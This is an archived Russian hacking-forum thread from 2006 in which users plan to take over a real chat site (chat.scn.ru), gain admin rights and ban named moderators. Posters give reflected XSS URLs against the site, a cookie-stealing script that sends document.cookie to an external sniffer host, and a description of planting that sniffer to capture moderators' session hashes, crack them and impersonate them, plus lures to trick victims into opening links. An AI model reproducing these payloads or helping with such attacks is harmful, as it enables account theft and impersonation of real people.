Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   проверьте чат на уязвимость (https://forum.antichat.xyz/showthread.php?t=18805)

ruh 08.05.2006 21:54

проверьте чат на уязвимость
 
Проверьте http://chat.scn.ru на уязвимость.
Подскажите как в нем получить права администратора, он там бывает очень редко все правосудие решат модераторы. Я здесь на форуме видал скрипты для получения прав, ни чего не помогает. Сам я уже давно пытаюсь с ним чего нибудь сделать, пока без результатно, видимо у меня пока не хватает знаний.
Подскажите как в этом чате забанить модератора.

.Slip 08.05.2006 22:40

Напиши ники кого нибудь из модераторов или ник админа..

Антошка2003 09.05.2006 15:13

чат кажется вудувский. только пассивные xss и флудеры. а вот форум phpBB, ищи в уязвимостях форума. реально поиметь кукисы админов.

ruh 09.05.2006 15:40

Цитата:

Сообщение от sL(IP)--!(P.i.N.)
Напиши ники кого нибудь из модераторов или ник админа..

Ник админа: андр или андр. Он там не бавыет, но раз в пол года может и заглянет.
Модераторы: их там половина всех пользователей чата.
Raydeln - самый главный, банит с поводом и без.
Baggi, Raph, ABC, Inserf, ... - в основном банят если того заслуживают.

ruh 09.05.2006 15:42

Цитата:

Сообщение от Антошка2003
чат кажется вудувский. только пассивные xss и флудеры. а вот форум phpBB, ищи в уязвимостях форума. реально поиметь кукисы админов.

что значит вудувский

что значит пассивные xss

.Slip 09.05.2006 15:44

Так с.. С Raydeln мы с Антошкой2003 уже познакомились)
Вот есть такая фишка
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('Yo')</script>
Вылетает на главную страницу, но с интересными надписями) Ещё пока что не знаю как использовать

.Slip 09.05.2006 15:47

Цитата:

что значит вудувский
Эта такая семья чатов) Voodoo
Цитата:

что значит пассивные xss
Кароч внизу ссылка) Я немного не так сказал)

Антошка2003 09.05.2006 15:55

http://www.forum.antichat.ru/thread7476.html
вот здесь всё подробно написано

.Slip 09.05.2006 16:38

_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
Всё, алерт вызвал.. Вылетал у меня на главную, при другом браузере.. На осле алерт успешно запустился..
Втыкай сниффер, и жди админа :)

Антошка2003 09.05.2006 16:52

алерт в чате запустился?

.Slip 09.05.2006 16:59

Нет, на пустой странице.. У тебя алерт запустился?
Вот результат, на осле:
_http://img119.imageshack.us/img119/4691/snap13nc.jpg

Антошка2003 09.05.2006 17:04

я не проверял ещё.
занят сейчас, ещё сижу жду хэши с форума.

ruh 09.05.2006 17:30

Цитата:

Сообщение от sL(IP)--!(P.i.N.)
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
Всё, алерт вызвал.. Вылетал у меня на главную, при другом браузере.. На осле алерт успешно запустился..
Втыкай сниффер, и жди админа :)

что такое аплет
что делать с этой сесией, тем более эдесь твой шел у меня он не пойдет

еще вопрос: как втыкать ваш снифер
в строку отправки сообщений втыкал выдает просто ссылку этого снифера кот я ввел.
или в строку браузера - толку то же нет
что я делаю не так

ruh 09.05.2006 17:35

ошибка не шел, а хэш

.Slip 09.05.2006 17:40

Цитата:

еще вопрос: как втыкать ваш снифер
http://antichat.ru/sniff/
Цитата:

что такое аплет
аЛЕрт, учим JavaScript...
Цитата:

что делать с этой сесией
она тебе не нужна..
Цитата:

тем более эдесь твой хеш у меня он не пойдет
Я проверял на себе, у знакомого тоже алерт вылазил нормально.. Всё пойдёт..

ruh 09.05.2006 17:50

Цитата:

Сообщение от sL(IP)--!(P.i.N.)
Эта такая семья чатов) Voodoo

как это определить

.Slip 09.05.2006 17:56

Цитата:

как это определить
Где то информация зашита в теле страницы, где то способствует личный опыт) Я сразу не определил что этот чат Voodoo, Антошка2003 определил) Что говорит о том что опыта больше.. А так вообще ходи по разным чатам, и уже будешь сам их определять в лёгкую..

Антошка2003 09.05.2006 17:56

каждый чат отличаеться друг от друга и это брасаеться в глаза.
в некоторых чатах написано что то вроде Powered by voodoo например.

.Slip 09.05.2006 18:00

Антошка2003, получил хэши?:)

Антошка2003 09.05.2006 18:02

нет ещё. сам сижу обновляю сниффер каждые 10 минут.

ruh 09.05.2006 18:03

Цитата:

Сообщение от sL(IP)--!(P.i.N.)

т.е. можно вот эту ссылку
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить в строку куда надо вводить адрес фотки, а место s.jpg написать реальный адрес фотки и звать всех заценить мою фотку

что делать с
http://chat.scn.ru/index.php?session...403f1a4794296a &go=<script>alert('XSS')</script>

ruh 09.05.2006 18:07

Цитата:

Сообщение от Антошка2003
нет ещё. сам сижу обновляю сниффер каждые 10 минут.

куда ты вводил адрес снифера
чет я сним совсем запутался

ruh 09.05.2006 18:09

если снифер выдает хэши => можно писать от друголи лица, проверьте это в этом чате

Антошка2003 09.05.2006 18:11

адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.

ruh 09.05.2006 18:25

Цитата:

Сообщение от Антошка2003
адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.

Цитата:

Сообщение от Антошка2003
адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.

постой куда именно и как ты вводил сниф в форуме и куда и как его вводить в чате из статьи я этого не понял

а нельзя просто скопировать форму отправки сообщений и свой хэш заменить на его, и отправлять сообщения неавторизовавшись

может просто сказать в чате что в форуме замутил клевую тему (якобы зацените)

.Slip 09.05.2006 18:36

Антошка2003, если не в лом, проверь алерт.. у меня некоторые подозрения насчёт него..
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
Цитата:

Он там не бавыет, но раз в пол года может и заглянет.
Долго хэши ждать прийдётся)

Антошка2003 09.05.2006 18:36

как вставлять в фрум читай здесь - http://www.forum.antichat.ru/thread12610.html
в чате на каждый вход даёться разная сессия, если авторизироваться его сессией, то может что то и выйдет. как сессию перехватывать смотри этот раздел, была тема о взломе вуду чатов.
попробуй скажи что замутили клёвую тему.

я попозже попробую с алертами, сейчас не могу пока что. но так кажется что он ничего не даст, но нужно посмотреть, может как и можно будет применить.

ruh 09.05.2006 18:47

[QUOTE=sL(IP)--!(P.i.N.)

Долго хэши ждать прийдётся)[/QUOTE]

я писал про чат в форуме я его не видел
Rayden всем заправляет, он в форуме часть бывает

.Slip 09.05.2006 18:49

ruh, ясн..
Оффтопик:
Rayden отключил меня на неделю, причина: наш чат не ломается
лол)

ruh 09.05.2006 18:49

опечатка:
часто бывает

ruh 09.05.2006 18:53

Цитата:

Сообщение от sL(IP)--!(P.i.N.)
ruh, ясн..
Оффтопик:
Rayden отключил меня на неделю, причина: наш чат не ломается
лол)



как он тебя спалил

ruh 09.05.2006 18:56

подведем итоги:

.Slip 09.05.2006 18:59

Я носки не стал менять, вот и спалил)

ruh 09.05.2006 19:03

Цитата:

Сообщение от sL(IP)--!(P.i.N.)
Я носки не стал менять, вот и спалил)

я серьезно


и почему на счет аплета ответ был учим, а не учи

.Slip 09.05.2006 19:07

Я тоже йопт) Нафлудили 4 страницы...(
Носки=прокси.. ясно?)
Цитата:

счет аплета ответ был учим, а не учи
1. аЛЕРт
2. жжош, не придирайся к словам) а то тему нахъ закроют за непомерный флуд

ruh 09.05.2006 19:13

так какой вывод по чату в общем:
1. получить права админа(модератора)
2. забанить модератора
3. что мне может дать та ссылка с xss

ruh 09.05.2006 19:15

4. можно ли в этом чате читать приваты

ruh 09.05.2006 19:18

ваше мнение и общие выводы по этому чату

согласны ли вы с Rayden по поводу не возможности взлома данного чата

.Slip 09.05.2006 21:53

Йопт, чат ломают не молотком..
Антошка2003, залил сниффер на форум, прийдут хэши, тогда и видно будет..
Потерпи немного, не на пожар..

Tem 10.05.2006 20:36

Так ребята я только что заметил тему прошолся по чату , тама ешё в чате есть КСС , боковой фрейм где ники, внезу (Фотографии),открываем и видем напись (Введите текст для поиска или ник:), ставим <script>alert()</script>, вылетает алерт, можна и им воспользоватся.


Время: 13:24